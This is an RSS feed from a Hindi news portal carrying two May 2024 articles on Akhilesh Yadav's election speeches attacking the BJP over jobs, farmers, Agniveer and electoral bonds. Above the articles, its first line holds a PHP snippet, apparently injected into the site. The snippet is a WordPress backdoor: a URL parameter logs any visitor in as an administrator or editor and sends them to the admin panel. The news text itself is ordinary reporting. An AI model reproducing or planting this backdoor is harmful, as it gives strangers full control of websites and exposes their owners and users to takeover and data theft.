// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); अखिलेश यादव – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sat, 25 May 2024 20:15:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 अखिलेश यादव ने भाजपा पर निशाना साधा, कहा- मुझे लगता है कि देवरिया आते आते डबल इंजन की सरकार हांफ जाती है https://pratyushaashakinayikiran.com/?p=34222 Sat, 25 May 2024 20:15:00 +0000 https://pratyushaashakinayikiran.com/?p=34222 देवरिया
जिले में समाजवादी पार्टी के प्रत्याशियों के पक्ष में चुनाव प्रचार करने पहुंचे समाजवादी पार्टी के अध्यक्ष अखिलेश यादव ने भाजपा सरकार पर जमकर निशाना साधा। केद्र और यूपी सरकार पर हमला बोलते हुए कहा कि मुझे लगता है कि देवरिया आते आते डबल इंजन की सरकार हांफ जाती है या फिर इसका धुंआ निकल जाता है। अबतो डबल इंजन सरकार का कबाड़ा निकल चुका है। ये वही लोग हैं जो किसानों से बोलते थे कि उनका आय दोगुनी कर देंगे। अब 10 साल के बाद जब किसान अपना हिसाब-किताब लगाता है तो पता चलता है कि किसानों के पैदावार की कीमत तक नहीं दिला पाई ये सरकार। बताओ किसान भाईयों  अपकी लागत बढ़ गई कि नहीं। इस मंहगाई के दौर में न केवल लागत बढ़ी है बल्कि पिछले 10 साल में इन लोगों ने आपके खाद की बोरी से भी चोरी करना शुरू कर दिया है।

नौकरी न देकर आपका एक तिहाई जीवन बर्बाद कर दिया
अखिलेश यादव ने आगे कहा कि याद रखना नौजवान साथियों आपके 10 साल नहीं गए हैं बल्कि आपको नौकरी न देकर आपका एक तिहाई जीवन बर्बाद कर दिया है। इन्होंने बड़े-बड़े सपने दिखाए थे कि निवेश आएगा। बड़े बड़े आयोजन लखनऊ, दिल्ली यहां तक कि विदेशों में भी किए। अगर हम पीछे मुड़कर देखते हैं तो जमीन पर निवेश के नाम पर सिर्फ जीरो पहुंचा है। ये लोग न केवल निवेश के नाम पर धोखा दिया बल्कि निवेश आने के बाद भी किसी नौजवान को नौकरी नहीं दिया। इसी सरकार में करीब 60 लाख नौजवानों ने परीक्षा दी लेकिन पेपर लीक होने के कारण उन्हें नौकरी नहीं मिली।

अग्निवीर की नौकरी 4 साल की है, इसे इंडिया गठबंधन स्वीकार नहीं करेगा
अखिलेश यादव यहीं नहीं रुके। उन्होंने कहा कि अग्निवीर की नौकरी 4 साल की है। आज हम अपने नौजवानों को कहकर जा रहा हूं कि हमारा इंडिया गठबंधन इस अग्निवीर योजना को कभी स्वीकार नहीं करेगी। जब भी हमारी सरकार आएगी हम इस अग्निवीर योजना को हमेशा के लिए हटाने का काम करेंगे। अभी तो ये अग्निवीर योजना सिर्फ फौज में आई है। हम खादी पहने वाले नौजवानों भाईयों को भी सावधान करता हूं कि अगर ये लोग सरकार में आ गए तो खाकी की नौकरी तीन साल के लिए कर देंगे।

इन लोगों ने ईडी, इनकम टैक्स, सीबीआई को डरा-धमका करके चंदा वसूला
अखिलेश यादव ने कहा कि इन लोगों ने ईडी, इनकम टैक्स, सीबीआई को डरा-धमका करके चंदा वसूला है। किसी से हजार करोड तो किसी से 500 तो किसी से 600 करोड़ ले लिए। आज हमें जिस मंहगाई का सामना करना पड़ रहा है कहीं न कहीं उस इलेक्ट्रोरल बांड की वजह से सामना करना पड़ रहा है।

 

]]>
अखिलेश यादव ने अमेठी में आयोजित जनसभा को संबोधित किया, कहा- ‘संविधान बदलने की साजिश कर रही है भाजपा https://pratyushaashakinayikiran.com/?p=31691 Fri, 17 May 2024 21:35:00 +0000 https://pratyushaashakinayikiran.com/?p=31691 नई दिल्ली
समाजवादी पार्टी के प्रमुख अखिलेश यादव ने अमेठी में आयोजित जनसभा को संबोधित किया। इस दौरान उन्होंने भाजपा सरकार पर जमकर निशाना साधा। अखिलेश ने आरोप लगाया कि भाजपा संविधान बदलने की साजिश कर रही है। संविधान जनता की प्रगति की नींव है, इंडिया गठबंधन इसे बदलने नहीं देगा और भाजपा को कभी सफल नहीं होने देगा। साथ ही अखिलेश यादव ने अमेठी लोकसभा सीट से प्रत्याशी के लिए वोट की अपील की।

अखिलेश ने लगाए भाजपा पर यह आरोप
भाजपा पर हमला बोलते हुए अखिलेश यादव ने कहा कि ''भाजपा के लोगों ने सेना में अग्निवीर लागू किया है। अगर फिर से सत्ता में आ गए तो पुलिस की नौकरी में भी अग्निवीर योजना लागू हो जाएगी। उन्होंने जनता से अपील की है कि जब वोट करने जाना तो बेरोजगारी व महंगाई को ध्यान रखना। अखिलेश ने कहा कि भाजपा संविधान  बदलने की साजिश कर रही है। इंडिया गठबंधन इसे कभी सफल नहीं होने देगा। अमेठी में सिलेंडर वाले लोग अब सरेंडर कर रहे हैं। 13 रुपये किलो की चीनी का ख्वाब दिखाया। मीठी चीनी के लिए कड़वा झूठ बोला गया था। एक और एक मिलकर 11 हो रहे हैं, इससे भारतीय जनता पार्टी वाले नौ दो ग्यारह हो रहे हैं।''

बीजेपी का रथ फंस गया है और धंस गया हैंः अखिलेश
अखिलेश यादव ने बीजेपी पर आरोप लगाया कि उनकी हर बात झूठी निकली। किसानों को दिल्ली तक में प्रदर्शन करना पड़ा। अपनी फसल की कीमतों के लिए। किसानों को तकलीफ पहुंचाने के लिए इन्होंने सड़कों को बंद कर दिया था, सड़कों पर कीलें लगवा दी थी। गाड़ियों को डीजल पेट्रोल नहीं भरने देते थे लेकिन, किसानों ने परवाह नहीं किया। अखिलेश ने कहा कि भाजपा वालों ने महंगाई बढ़ाई है, बेरोजगारी और गरीबी बढ़ाई है। युवाओं को नौकरी न देना पड़े, इसके लिए भाजपा ने पेपरलीक करा दिया। भाजपा चारों खाने चित्त हो गई हैं। इनका रथ फंस गया है और धंस गया हैं। अब निकलने वाला नहीं है।

 

]]>